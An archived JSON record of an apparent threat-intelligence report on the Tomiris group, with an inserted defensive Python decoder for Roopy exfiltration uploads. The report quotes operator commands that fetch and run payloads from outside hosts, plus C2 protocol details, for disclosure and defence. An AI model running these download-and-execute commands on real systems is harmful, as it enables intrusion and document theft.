{
	"id": "e50f4f42-24a7-4d20-892d-c6b064804e0a",
	"created_at": "2026-04-06T00:06:28.789727Z",
	"updated_at": "2026-04-10T03:37:33.014561Z",
	"deleted_at": null,
	"sha1_hash": "efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9",
	"title": "Tomiris called, they want their Turla malware back",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 230346,
	"plain_text": "Tomiris called, they want their Turla malware back\r\nBy Pierre Delcher\r\nPublished: 2023-04-24 · Archived: 2026-04-05 15:30:35 UTC\r\nIntroduction\r\nWe introduced Tomiris to the world in September 2021, following our investigation of a DNS-hijack against a\r\ngovernment organization in the Commonwealth of Independent States (CIS). Our initial report described links\r\nbetween a Tomiris Golang implant and SUNSHUTTLE (which has been associated to\r\nNOBELIUM/APT29/TheDukes) as well as Kazuar (which has been associated to Turla); however, interpreting\r\nthese connections proved difficult.\r\nWe continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023,\r\nand our telemetry allowed us to shed light on the group. In this blog post, we’re excited to share what we now\r\nknow of Tomiris with the broader community, and discuss further evidence of a possible connection to Turla.\r\nActor profile\r\nTomiris focuses on intelligence gathering in Central Asia. Tomiris’s endgame consistently appears to be the\r\nregular theft of internal documents.\r\nThe threat actor targets government and diplomatic entities in the CIS. The occasional victims discovered\r\nin other regions (such as the Middle East or South-East Asia) turn out to be foreign representations of CIS\r\ncountries, illustrating Tomiris’s narrow focus.\r\nIt is characterized by its tendency to develop numerous low-sophistication “burner” implants in a variety of\r\nprogramming languages that are repeatedly deployed against the same targets, using elementary but\r\nefficient packaging and distribution techniques. 
Tomiris occasionally leverages commercial or open-source RATs.\r\nLanguage artifacts discovered in Tomiris’s implant families and infrastructure from distinct campaigns all indicate that the threat actor is Russian-speaking.\r\nOverall, Tomiris is a very agile and determined actor, open to experimentation – for instance with delivery methods (DNS hijacking) or command and control (C2) channels (Telegram).\r\nThe following map shows the countries where we detected Tomiris targets (colored in green: Afghanistan and CIS members or ratifiers). It is worth noting that while we identified a few targets in other locations, all of them appear to be foreign diplomatic entities of the colored countries:\r\n[Map: countries where Tomiris targets were detected]\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 1 of 17\n\nTomiris uses a wide variety of malware implants developed at a rapid pace and in all programming languages imaginable. We hypothesize that the general aim is to provide operators with “full-spectrum malware” in order to evade security products. In fact, on several occasions we observed the actor persistently cycling through available malware strains until one of them was finally allowed to run on victim machines.\r\nTools used by Tomiris fall into three categories:\r\n- Downloaders, rudimentary malicious programs whose role is to deploy a backdoor or required additional legitimate tools.\r\n- Backdoors, whose feature set is typically limited to reconnaissance, command execution, file download and file upload.\r\n- File stealers specifically built to exfiltrate documents, often relying on a hardcoded list of file extensions to automatically find recently edited files and upload them to a C2. 
Some file stealers are backdoor variants and share the same code base.\r\nTomiris goes after its victims using a wide variety of attack vectors: spear-phishing emails with malicious content attached (password-protected archives, malicious documents, weaponized LNKs), DNS hijacking, exploitation of vulnerabilities (specifically ProxyLogon), suspected drive-by downloads and other “creative” methods (see details of the investigation described below). The following table lists all Tomiris malware families we are aware of:\r\nName | Type | Language | Comments\r\nTomiris Downloader | Downloader | C | Mentioned in our original blog post. Some samples contain traces of Russian language.\r\nTomiris (Golang implant) | Backdoor | Golang | Described in our original blog post.\r\nSBZ[1] filestealer | File stealer | Golang | Document stealer based on the source code of the Tomiris Golang implant.\r\nTomiris download scheduler | Downloader | C | A variant of Tomiris Downloader that additionally uses scheduled tasks to download a payload.\r\nTomiris .NET downloader | Downloader | .NET | A .NET variant of Tomiris Downloader, mainly used to deploy required legitimate tools, such as WinSCP.\r\nTelemiris | Backdoor | Python | Contains traces of Russian language.\r\nRoopy | File stealer | Pascal | Similar to SBZ filestealer (see above).\r\nJLORAT | Backdoor | Rust | Various traces of Russian language in this family.\r\nJLOGRAB | File stealer | Rust | Based on JLORAT’s source code.\r\nIn addition, Tomiris leveraged open-source or commercially available implants and offensive tools. Notably, the latter were associated with Tomiris because they were downloaded by the Tomiris Downloader, shared a common C2 with other Tomiris implants, and/or were leveraged to deploy other Tomiris implants:\r\nRATel: Open-source RAT available on GitHub. One of the samples (MD5 10B315FB7D8BA8D69337F04ED3891E75) that we attributed to Tomiris was downloaded from mail.mfa.uz.webmails[.]info, which has been referenced by Cyjax.\r\nPython Meterpreter loader: Metasploit-provided Python script that is leveraged to deploy a Meterpreter instance in memory. These are frequently packed using py2exe, PyInstaller or Nuitka.\r\nWarzone RAT: A commercial C++ RAT.\r\n[Figure: Relationships between Tomiris tools. Arrows indicate direct execution.]\r\nOverall, pieces from the Tomiris toolset appear to be generally interchangeable and don’t appear to be tied to specific campaigns or victims. Operators routinely mix and match the various families, trying to deploy tools (often repeatedly) with little regard for stealth until one doesn’t get caught by antivirus software.\r\nThe following paragraphs provide a summary description of the main malware strains used by Tomiris.\r\nTelemiris\r\nTelemiris is a Python backdoor originally packed with PyInstaller (we later identified some Nuitka-packaged samples as well). Its name derives from the fact that it uses Telegram as a C2 channel. After setting up persistence (copying itself under %AppData%/service/ and creating a RUN key entry), the malware enters its main loop where it waits for Telegram messages and replies to them. Supported commands are:\r\n/run: Execute an arbitrary command on the victim’s machine. It’s worth noting that command results are expected to be encoded in a Cyrillic code page.\r\n/download \u003cpath\u003e: Sends the contents of the file stored on the victim’s machine at the given path.\r\n[file attachment]: Writes the received file on the victim’s machine at the path specified in the attachment’s caption, or in the current directory by default. Telemiris replies with “Файл загружен!” (“File downloaded!”).\r\nFrom what we observed, Telemiris is used as a first-stage implant that operators use to deploy other tools such as Roopy, JLORAT, or even the legitimate WinSCP binary, to further exfiltrate files.\r\nRoopy\r\nWritten in Pascal, this file stealer crawls the victim’s filesystem at regular intervals and uploads all files of interest to its C2 server. At startup, it wastes CPU cycles on dead code and useless loops, which we assume are for evasion purposes. Roopy then creates its working directory (%AppData%/Microsoft/OneDrive) where it stores the list of already uploaded files (as upload.dat) and a copy of documents waiting to be uploaded (in the backup subfolder). Then, every 40-80 minutes, Roopy crawls C:\\Users and all other drives (D:, E:, …), looks for all documents (.doc, .docx, .xls, .xlsx, .txt, .pdf) modified in the last month, and stages them for upload. Discovered files are collected in ZIP archives up to 5 MB in size and sent to the C2 server over plain HTTP using POST requests containing data such as:\r\n{\r\n  \"n\": \"[timestamp]_[part].zip\",\r\n  \"t\": \"[computer name]\",\r\n  \"s\": \"[timestamp]\",\r\n  \"b64\": \"[base64-encoded zip file]\"\r\n}\r\nThis data format and naming convention, as well as the URL scheme used by the C2 server (i.e., /h/pa), are very similar to those of the SBZ filestealer. 
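As an added illustration (not code from the original post, and not Roopy’s own code), the following Python decoder reconstructs the upload format described above so that a captured POST body can be validated and its staged documents listed. It assumes that the timestamp is an integer string and that parts are numbered from 1; neither is stated in the post, and the sample files, host name and timestamp are constructed:

```python
import base64
import binascii
import io
import json
import re
import zipfile

# Conventions taken from the post: uploads are POSTed to /h/pa as a JSON object
# with keys n, t, s and b64, and n follows [timestamp]_[part].zip.
ROOPY_C2_PATH = '/h/pa'
ROOPY_KEYS = {'n', 't', 's', 'b64'}
ROOPY_NAME_RE = re.compile(r'^[0-9]+_[0-9]+[.]zip$')


def build_roopy_body(computer_name, timestamp, part, files):
    # Reconstructs a Roopy-style body from constructed sample files so the
    # decoder has realistic input. Assumption (not stated in the post): the
    # timestamp is a plain integer and parts are numbered from 1.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return json.dumps({
        'n': '%d_%d.zip' % (timestamp, part),
        't': computer_name,
        's': str(timestamp),
        'b64': base64.b64encode(buf.getvalue()).decode('ascii'),
    })


def is_roopy_upload(url_path, body_text):
    # Cheap triage check for proxy logs: the request path and the exact key
    # set must both match. Anything unparsable is simply not a match.
    if url_path != ROOPY_C2_PATH:
        return False
    try:
        body = json.loads(body_text)
    except ValueError:
        return False
    return isinstance(body, dict) and set(body) == ROOPY_KEYS


def decode_roopy_body(body_text):
    # Validates a captured body step by step and returns what an analyst needs:
    # the victim host, the archive name and part number, and the staged files.
    body = json.loads(body_text)
    missing = ROOPY_KEYS - set(body)
    if missing:
        raise ValueError('missing keys: %s' % sorted(missing))
    name = body['n']
    if not ROOPY_NAME_RE.match(name):
        raise ValueError('archive name %r does not follow [timestamp]_[part].zip' % name)
    part = int(name[:-4].split('_')[1])
    try:
        raw = base64.b64decode(body['b64'], validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError('payload is not valid base64: %s' % exc)
    if raw[:2] != b'PK':
        raise ValueError('payload is not a ZIP archive (no PK magic)')
    try:
        with zipfile.ZipFile(io.BytesIO(raw)) as zf:
            members = [(info.filename, info.file_size) for info in zf.infolist()]
    except zipfile.BadZipFile as exc:
        raise ValueError('payload has PK magic but is not a readable ZIP: %s' % exc)
    return {
        'computer': body['t'],
        'timestamp': body['s'],
        'archive': name,
        'part': part,
        'members': members,
    }


if __name__ == '__main__':
    # Constructed sample: two recently edited documents from a fictional host.
    sample = build_roopy_body('WKS-01', 1663047600, 1, {
        'report.docx': b'docx bytes',
        'notes.txt': b'meeting notes',
    })
    print(is_roopy_upload(ROOPY_C2_PATH, sample))
    print(decode_roopy_body(sample))
```

The checks run in the order an analyst would want them (key set, archive name, base64 validity, ZIP magic, then member listing), so a body that only superficially resembles a Roopy upload fails early with a specific reason rather than producing an empty or misleading result.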
We identified a number of variants of Roopy where logging can be either enabled or disabled by default, or where the base64 encoding scheme was replaced by a simple subtraction from the bytes of the obfuscated data.\r\nJLORAT\r\nOur first sightings of this Rust malware date back to August 2022. Similar to Telemiris, JLORAT copies itself under %AppData% and sets up persistence via a registry RUN key. It also creates a mutex to ensure that only one instance runs (named “whatever”, as in the default usage example for the “single-instance” Rust library that is embedded).\r\nThe backdoor starts by gathering information on the victim machine, such as the system information, current user and public IP address. The information is sent via an HTTP POST request to the C2 on a non-standard port (i.e., 9942). Sample data sent to the C2 could be:\r\n{\r\n  \"admin\": true,\r\n  \"cmd\": \"\",\r\n  \"cpu_vendor\": {\r\n    \"brand\": \"[REDACTED]\",\r\n    \"cores\": 6,\r\n    \"cpu_usage\": 0,\r\n    \"frequency\": 2400,\r\n    \"name\": \"CPU 6\",\r\n    \"vendor_id\": \"[REDACTED]\"\r\n  },\r\n  \"hwid\": \"[REDACTED]\",\r\n  \"ip\": \"[REDACTED]\",\r\n  \"memory\": \"32.0\",\r\n  \"resolution\": \"1280x1024\",\r\n  \"software\": [\r\n    \"Microsoft Visual C++ 2005 Redistributable (x64)\",\r\n    \"[REDACTED, list of further installed software items]\"\r\n  ],\r\n  \"username\": \"[REDACTED]\",\r\n  \"version\": \"Windows 7 Professional\"\r\n}\r\nJLORAT then looks for specific keywords in the data returned by the C2 to start processing orders:\r\n0: No operation\r\ncmd|[command]: Executes the specified command, and returns the result in the cmd key of the JSON response. Some specific subcommands are processed by JLORAT directly and not passed to the command prompt, such as cmd|cd (change working directory), cmd|ls or cmd|dir (lists files in the current directory) and cmd|curfile (returns the path to the JLORAT binary).\r\nupload|path: Sends the designated file from the victim to the C2, on TCP port 9999.\r\ndownload|url|path: Saves the file at the given URL to the provided path on the victim’s machine.\r\nscreen: Takes a screenshot and sends it to the C2 on TCP port 9999.\r\nData sent to port 9999 is not passed in a JSON dictionary, but instead follows a specific format:\r\nOffset | Field name | Description\r\n0 | FILENAME_LEN | Length of the filename of the data being sent (4 bytes, as the offsets imply)\r\n4 | FILENAME | Name of the file being sent\r\n4 + FILENAME_LEN | CONTENT_LEN | Length of the data (4 bytes, as the offsets imply)\r\n8 + FILENAME_LEN | CONTENT | Payload\r\nWe also discovered variants of JLORAT bundled with additional modules – effectively turning it into a file stealer we call JLOGRAB. Just like Roopy, JLOGRAB:\r\n- Periodically looks for documents (a combination of .txt, .pdf, .xml, .xlsx, .doc and .docx files depending on the sample)\r\n- Saves the list as %AppData%/temp_id.txt\r\n- Copies discovered documents under %AppData%/transport\r\n- Uploads them to the C2 in ZIP archives.\r\nJLORAT contains traces of Russian language in status messages (“Директория установлена!”, meaning “Directory set”). The source binary also contains metadata indicating that some of the source code is stored in a “moduls” folder, which appears to be a misspelling of the English word “modules”, or a poor transliteration of the Russian word “модуль” (pronounced: modul’).\r\nTomiris’s deployment spree: TunnusSched giveaway\r\nOn January 5, 2023, Mandiant released a blog post describing attacks against Ukrainian entities that they attributed to Turla. 
Let’s start by briefly summing up their findings:\r\n- In September 2022, a threat actor purchased an expired domain name (anam0rph[.]su) that used to be part of a botnet (Andromeda) infrastructure. This allowed them to receive incoming connections from previous, dormant infections and take over a number of machines.\r\n- Victims in Ukraine were infected with KopiLuwak and QUIETCANARY, two malware strains previously associated with Turla.\r\nWhile publicly available data indeed shows that anam0rph[.]su was re-registered on August 12, 2022, we couldn’t find any link between Andromeda and KopiLuwak in our telemetry. Nevertheless, we had been tracking QUIETCANARY since 2019 under the name “TunnusSched” (not “Tunnus” as Mandiant’s reporting indicates), and decided to take a closer look at samples collected during the same period.\r\nTo our great surprise, we discovered that one TunnusSched/QUIETCANARY sample (MD5 B38160FC836AD42F1753A0873C844925) had been delivered to a government target in the CIS on September 13, 2022. Our telemetry additionally shows that this TunnusSched malware was deployed…from Tomiris’s Telemiris (MD5 C49DBF390E876E926A338EA07AC5D4A7).\r\nMore precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known Tomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy. These efforts were thwarted by security products, which led the attacker to make repeated attempts, from various locations on the filesystem:\r\n$\u003e bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar [REDACTED]\\lsasss.rar\r\n$\u003e rar.exe x \"[REDACTED]\\lsasss.rar\" \"[REDACTED]\\\"\r\n$\u003e [REDACTED]\\lsasss.exe\r\n$\u003e dir \"[REDACTED]\\\r\n$\u003e del \"[REDACTED]\\document.rar\"\r\n$\u003e [...]\r\n$\u003e wmic list drives\r\n$\u003e wmic diskdrive get name\r\n$\u003e wmic logicaldisk where drivetype=5 get deviceid, volumename, description\r\n$\u003e wmic logicaldisk where drivetype=3 get deviceid, volumename, description\r\n$\u003e [...]\r\n$\u003e bitsadmin /transfer www /download hxxps://telegram.akipress[.]news/lsasss.rar F:\\lsasss.rar\r\n$\u003e rar.exe x \"F:\\lsasss.rar\" \"F:\\\"\r\n$\u003e F:\\lsass.exe\r\n$\u003e tasklist | findstr /I \"lsasss\"\r\nAll these attempts ended in failure. After a one-hour pause, the operator tried again at 07:19 UTC, this time using a TunnusSched/QUIETCANARY sample:\r\ncurl hxxps://crane[.]mn/wp-content/plugins/jetpack/modules/photon-cdn/EpsonDeviceControl.exe --output [REDACTED]\\epsondevicecontrol.exe\r\nThe TunnusSched sample was blocked as well, and the operator resumed trying to deploy JLORAT and Roopy samples up to the next day. This activity and brute-force approach to infection is completely consistent with other Tomiris infections we have observed in the past.\r\nAttribution: reading KopiLuwak’s story again\r\nMandiant noted that some elements of the recent TunnusSched case they analyzed “appear to be a departure from historical Turla operations”, but the use of KopiLuwak and TunnusSched led them to link this activity to Turla 
In order to perform a critical analysis of this attribution process, we need to go back in time.\r\nKopiLuwak has belonged to Turla\r\nKaspersky first reported on KopiLuwak in 2016. Back then, this JavaScript reconnaissance tool was used to\r\ndeploy ICEDCOFFEE in countries like Greece, Romania and Qatar. We attributed the associated attack campaign\r\nto Turla and could not find any reason to believe that was incorrect.\r\nTunnusSched and KopiLuwak are part of the same toolset\r\nStarting from 2019, we discovered additional implant families that were linked to KopiLuwak (and so, to Turla),\r\nstarting from 2019. The implants were additionally linked together, mainly because they leverage an identical RC4\r\nimplementation:\r\nMalware name Links to Turla\r\nTopinambour\r\nDelivered KopiLuwak samples\r\nShared TTPs (use of compromised WordPress sites)\r\nSame RC4 implementation as Tunnus and TunnusSched\r\nTunnus\r\nFound on machines infected with KopiLuwak\r\nShared TTPs (use of compromised WordPress sites)\r\nSame RC4 implementation as TunnusSched and Topinambour\r\nTunnusSched\r\n(QUIETCANARY)\r\nShared PDB path with Tunnus\r\nSame RC4 implementation as Tunnus and Topinambour\r\nRocketMan\r\nFound on machines infected with Topinambour\r\nCode similarities with TunnusSched\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 11 of 17\n\nCode similarity between Topinambour (left) and TunnusSched (right)\r\nThe RC4 implementation in these samples results in strictly identical .NET bytecode that, as far as we could\r\nverify, is unique to Tunnus, TunnusSched and Topinambour.\r\nThe fact that all these implants are interconnected leaves little doubt, and Topinambour at least is strongly linked\r\nwith KopiLuwak. 
As a result, we (still) believe with high confidence that TunnusSched and KopiLuwak are\r\nboth part of similar toolsets, starting from 2019 at the latest.\r\nMandiant’s recent findings also confirm that KopiLuwak and TunnusSched were still part of the same toolset\r\nas of September 2022, as they were both deployed against targets in Ukraine during a single operation.\r\nBut Tomiris uses TunnusSched\r\nAs we recently discovered (and detailed in “Tomiris’s deployment spree: TunnusSched giveaway”), TunnusSched\r\nwas leveraged by Tomiris against a government target in the CIS in September 2022.\r\nAdditionally, we believe with medium confidence the TunnusSched usage described by Mandiant to be part\r\nof Tomiris’s operations, because:\r\nThe TunnusSched sample that was leveraged by Tomiris (MD5\r\nB38160FC836AD42F1753A0873C844925) is very similar to the one that was deployed from KopiLuwak\r\nas per Mandiant’s reporting (MD5 403876977DFB4AB2E2C15AD4B29423FF). Most notably, they share\r\nidentical RC4 encryption keys, user agent strings, unused code (the “ServerInfoExtractor” class), PDB root\r\npath (“c:\\Users\\Scott\\source\\repos\\Kapushka.Client\\BrowserTelemetry\\obj\\Release\\”, starting with a\r\nlowercase “c:”), both have explicit references to VisualStudio 15.7, and a compilation date set to\r\nSeptember 2022.\r\nhttps://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/\r\nPage 12 of 17\n\nThe TunnusSched sample used by Tomiris and the one referenced by Mandiant were both (only) deployed\r\nagainst targets in the CIS during the same timeframe (September 2022).\r\nThe TunnusSched deployment described by Mandiant involved taking over an extinct Andromeda C2\r\ndomain. We first introduced Tomiris as a threat actor who took over legitimate government hostnames to\r\ndeploy the Tomiris Golang implant, and it has continued to do so. 
As a result, we believe it is likely that Tomiris hijacked extinct Andromeda hostnames or domains.\r\nSo Tomiris uses KopiLuwak!\r\nAs we have already established, TunnusSched and KopiLuwak are part of similar toolsets (starting from 2019 at least). They were also used together during the same operation in September 2022 in the CIS, while TunnusSched was also deployed separately by Tomiris in the CIS – both independently analyzed cases leveraging very similar TunnusSched samples.\r\nAs a result, we believe with medium-to-high confidence that both TunnusSched and KopiLuwak are being leveraged by Tomiris. Additionally, we cannot rule out Tomiris having used KopiLuwak as early as 2019, conducting operations that may have been wrongly attributed to Turla back then.\r\nWait: wouldn’t that mean Tomiris IS Turla?\r\nThis entire discussion would be moot if we believed Tomiris to be (a sub-cluster of) Turla – but this is not the case. While our initial blog post introducing Tomiris noted similarities with malware used in the Sunburst attack, we continued to track the two sets of activity separately. Years later, we are convinced that despite possible ties between the two groups, Turla and Tomiris are separate actors. Tomiris is undoubtedly Russian-speaking, but its targeting and tradecraft are significantly at odds with what we have observed for Turla. In addition, Tomiris’s general approach to intrusion and limited interest in stealth are significantly at odds with documented Turla tradecraft.\r\nIt follows that two groups (that we know of) may have used KopiLuwak at different points in time. What are the possible explanations for this?\r\n- It is possible that Turla doesn’t mind using a tool that was burned in 2016 and is still using it in current operations along with new tools.\r\n- Given that KopiLuwak, Tunnus, TunnusSched, etc. are written in JavaScript and .NET, where the source code is essentially provided with the malware, other threat actors may have repurposed these tools and are using them under a false flag.\r\n- Turla shares tools and expertise with Tomiris, or cooperates with Tomiris on joint operations. In this scenario, it might be acceptable for Turla to give away burned tools, or to use old implants that will not disclose current capabilities to their partners.\r\n- Tomiris and Turla rely on a common supplier that provides offensive capabilities. Or maybe Tomiris initially started out as a private outfit writing tools for Turla and is now branching out into the mercenary business. If so, it is entirely possible that Tomiris, using the toolset it developed for Turla, is conducting operations for different customers.\r\nOur assessment is that the first two hypotheses are the least likely and that there exists a form of deliberate cooperation between Tomiris and Turla. Its exact nature is, however, hard to determine with the information we have at hand. In any case, depending on when Tomiris started using KopiLuwak, a number of campaigns and tools believed to be linked to Turla may in fact need to be re-evaluated.\r\nNot only may Topinambour, Tunnus, TunnusSched (QUIETCANARY) and RocketMan have been used by Tomiris in the past (we know this is the case for TunnusSched, and very likely for Tunnus due to the discovery of government victims in Russia in 2019); it could also be the case that these tools are Tomiris’s exclusive property. Looking back, we cannot help but notice that all of these tools were predominantly used in the CIS region, which is consistent with Tomiris’s traditional victimology.\r\nConclusion\r\nWith this report, we hope to alert the community to the dangers of using KopiLuwak and TunnusSched to link cyberattacks to Turla. 
To the best of our knowledge, this toolset is currently shared between Tomiris and Turla, and we cannot rule out that more actors outside our purview have access to it. We expect the attribution of this cluster of activities to remain unclear for the near future.\r\nIn the grander scheme of things, this investigation reveals the pitfalls that the information security industry faces when working on cyberattacks. We rely on a knowledge pool generously shared among all participants, yet information decays: what is true today may turn out to be wrong tomorrow. Discovering new, reliable data isn’t enough; existing assumptions also need to be substantiated – which can only happen when vendors publish data. In that spirit, we kindly thank Mandiant for the research they published.\r\nFinally, this investigation illustrates the limits of technical attribution. Looking at infections and malware samples only gets us so far, and we are often reminded that APT groups are subject to organizational and political constraints. 
On rare occasions, we stumble upon a piece of the puzzle that allows us to pierce the veil.\r\nAs for the Tomiris mystery, we’ll be eagerly awaiting the next piece.\r\nIndicators of compromise\r\nTelemiris\r\nMD5 edb0c08f8b6bb179b4395d8a95619d07\r\nSHA-1 f8d87d5b251671af624c3eaf7ac5cc42a0acadd0\r\nSHA-256 00466d76832193b3f8be186d00e48005b460d6895798a67bc1c21e4655cb2e62\r\nMD5 c49dbf390e876e926a338ea07ac5d4a7\r\nSHA-1 bc9314760071a4aef12e503104478059808e7047\r\nSHA-256 df75defc7bde078faefcb2c1c32f16c141337a1583bd0bc14f6d93c135d34289\r\nMD5 485a08c6ff6a8b05fab42facc0225035\r\nSHA-1 da6635def86b50a5de25f148426f68d3d8ab450a\r\nSHA-256 fd7fe71185a70f281545a815fce9837453450bb29031954dd2301fe4da99250d\r\nTomiris Golang implant\r\nMD5 6b567779bbc95b9e151c6a6132606dfe\r\nSHA-1 a0de69ab52dc997ff19a18b7a6827e2beeac63bc\r\nSHA-256 80721e6b2d6168cf17b41d2f1ab0f1e6e3bf4db585754109f3b7ff9931ae9e5b\r\nSBZ filestealer\r\nMD5 51aa89452a9e57f646ab64be6217788e\r\nSHA-1 0b6e1df37ba89d3d35b4b18afc0ffeb46644ff76\r\nSHA-256 cb78495bee37e768ef4566aa1c2cfb5478bae779127430f90c3da75e407350b8\r\nMD5 20c9ca66d2844edb94a623e77accaa5f\r\nSHA-1 752678274224bf9fef83843e44820f6bcd738758\r\nSHA-256 0767806f5734dca1553cae6a835c24a6d92abd678928b64f70dbd8811ed44aca\r\nTunnusSched\r\nMD5 5d6b920fd8f3b5a3a8c9dead25e3a255\r\nSHA-1 902b27a5fd2e5f17e5340e350afa037549ce9faa\r\nSHA-256 0fc624aa9656a8bc21731bfc47fd7780da38a7e8ad7baf1529ccd70a5bb07852\r\nMD5 4452290e674ab521fa0941d45cc6b22f\r\nSHA-1 459b17c42017cfdfc7eb804b5c0ee52aa6035d78\r\nSHA-256 3f94b20cb7f4ff55207660649ebbb02679c991fe03efbcb0bd3840fc7f0bd527\r\nMD5 e59752ffc116388dd863fc2e30e4aaea\r\nSHA-1 98059a86b681b0b8a09a95def3ef874c531b1d66\r\nSHA-256 29314f3cd73b81eda7bd90c66f659235e6bb900e499c9cc7057d10a9083a0b94\r\nTopinambour\r\nMD5 47870ff98164155f088062c95c448783\r\nSHA-1 15e710a107830b193124a6d2bbc785b9383262a9\r\nSHA-256 009406c1c7c0b289a25d44dfaa8364633d9b71df5f3c7a65deec1ef00a8c2ebb\r\nRocketMan\r\nMD5 a80bbd753c07512b31ab04bd5e3324c2\r\nSHA-1 7bb6e4a1ede35867ce5c57b5668f6aacae025b81\r\nSHA-256 046f11a6c561e46e6bf199ab7f50e74a4d2aaead68cdbd6ce44b37b5b4964758\r\nTunnus\r\nMD5 9be1cccd8e6ff0bd2ad7868a7c1308c0\r\nSHA-1 0be035e2d7180a908566a6bdaa907ed74b08b790\r\nSHA-256 85295ab44d0903a2cf4cbdcae55129a40cf5f7fb7210a304fa91a86929fd2cd9\r\nRoopy\r\nMD5 66357e47bbc2ec5694e2c5de9cc3b9c6\r\nSHA-1 ce9db7dbf3368757c232aa960bbfa7b83278618d\r\nSHA-256 0dfbc54a5a88f27e52807873c20872bc6bf92b822de90545492081c4e4f96778\r\nMD5 d3e1043cf5382e97685340760c9d3d61\r\nSHA-1 90f1e9fb5845f985cd0995c75e0746a8e47cf8e9\r\nSHA-256 9c086f242120be7a9e57e06b75d8ef6f051a77c6339deaeb574e80ee69590111\r\nMD5 0f092bfc9f9adaf93750df4ae3cdc0f7\r\nSHA-1 e2f191b251ba5c57cdbb5a6d3bfab57957900fcf\r\nSHA-256 a4ea3462bd5aedccc783d18d24589018c257b2a6e092164c01de067a8e3cd649\r\nJLORAT\r\nMD5 8674100d43231294b6562717a9ab3a07\r\nSHA-1 f918e5f50bb3b73a732bc9cb3595bff2ea7b761f\r\nSHA-256 296599df29f4ffa9bf753ff9440032d912969d0bab6e3208ab88b350f9a83605\r\nMD5 d09f792e5ea9f1239f3454fd1ce7893c\r\nSHA-1 9902917a3af585e695141caf347a2f19a065a7df\r\nSHA-256 69bb729ff354cd9651f99a05f74f3ea20d483dc8e6e5838e4dd48858fd500d29\r\nTomiris Downloader\r\nMD5 fd59dd7bb54210a99c1ed677bbfc03a8\r\nSHA-1 292c3602eb0213c9a0123fdaae522830de3fad95\r\nSHA-256 c9db4f661a86286ad47ad92dfb544b702dca8ffe1641e276b42bec4cde7ba9b4\r\nMD5 bcd52718195416b47c3538a89b62c305\r\nSHA-1 5a368354696d06319a050071f48bc6767d92b49a\r\nSHA-256 8391c182588b79697337e401a6424c12b3d707c00c15a17ec59059deedb0e2c4\r\nMD5 daf4f59224cc7c5e94c924f43a76f300\r\nSHA-1 6161aa9d9888472647a9792eead944bfc678c920\r\nSHA-256 8ec159179d49b44849febe7ed522c8fb836d5658ef868db41d2181fb4b1cbd3f\r\nMD5 d1986646b9be824414845f8e98c7961b\r\nSHA-1 98f1a215cd87e08d33f0d2ba13020661e629c6b8\r\nSHA-256 b144229fb62799aa23537eaf0ce267b1445a182c28f4679e8f8234eeb5e603f3\r\nMD5 45a857603e0e72174452fd073ad373de\r\nSHA-1 c1b7547da13b7c78cd6c5c354af945b2eff767c9\r\nSHA-256 e2d4d030542a44a8d4cc8b97da7b26487570dda432a736766dd2ab6d57a3b787\r\nTomiris .NET Downloader\r\nMD5 11ed3f8c1a8fce3794b650bbdf09c265\r\nSHA-1 4040bb7e4ebc98c22bda98680b207ec89767b759\r\nSHA-256 4f237b5aa3ff4fc4e3014f693c27a1cba94fc24f3a6054c28d090592343c06a2\r\nMD5 92c6d7fb1118d2e276dd4ad878db37f6\r\nSHA-1 53baccf15963dc85447cc822ec95ef8ed0326ac6\r\nSHA-256 358411a3b4a327805d629612b1b64357efe5389e56ddae9128ababbc8a2357a1\r\nMD5 796c232286743b95fed38d9d5c74f879\r\nSHA-1 cac58134db8bb3c6b0d8f21957cadb9110fa3727\r\nSHA-256 65da1696d36da254779a028b881a1890b0b037e7eee8ea0a9446c8bb0729c1cf\r\nTomiris Download Scheduler\r\nMD5 956cefc9a1759078ccf75b192db10ced\r\nSHA-1 245b78c615c57abaf46235f184a727587c882b69\r\nSHA-256 c5a9be4055e5f00bf3f2e6c57ba1b796157a74406657fd554d69491868cd5925\r\nMD5 67340dba1c379a84df88e639608de310\r\nSHA-1 aa494696a413b652e667cbbb7ccee35a68b45c87\r\nSHA-256 5e66256adbf973f6ab2252c14d6f0d8da2d326f52f6433bcf3a7cd7c60ae8f01\r\nRATel\r\nMD5 d83b31fe5f0144468aad4619c2418ac8\r\nSHA-1 23f388aced4b1732744cbd5fca1a24b8a82c01a9\r\nSHA-256 e152322530819d196fb411a0cb12cf4bcc94975b400a17b95f0fc2e28f6493e5\r\nMD5 447cf4a077f17096ca16a29333b7a046\r\nSHA-1 4a572e67a799ebbb2b9d7260aedb780e3005be51\r\nSHA-256 352f9cd4c14c1002d6c8d902cbca4e96d03a8bb243b33dd192a2260fe66091a1\r\nMD5 10b315fb7d8ba8d69337f04ed3891e75\r\nSHA-1 c56991857a9c09e25f3dd56066b4a322cc5c03d9\r\nSHA-256 4c8eddeab2d40178712685d09da5187b996389fba62c7f9b9635b07060b1e013\r\nPacked Python Meterpreter loader\r\nMD5 322837acdcedc952587e7be9886ddffd\r\nSHA-1 19357154ff3e43c968fd09f61db1e6e8084384fa\r\nSHA-256 98275bfe968d5998230bdf18de1be795b5ad42bd82b5ecb1405b00afba6f533d\r\nMD5 778d491e9742199b558e84a27c559612\r\nSHA-1 66271b2536481a6b2a3ae21412ce5ef50a692cfa\r\nSHA-256 9cd10a2d9db9cf1c5b3454c323fd148f5a322b4100f35e0a73ed4632038631cc\r\n[1] Name is directly extracted from strings in binary samples. Despite similarity to the “STAITBIZARRE” implant (also sometimes called “SBZ”), it is completely unrelated.\r\nSource: https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
	],
	"report_names": [
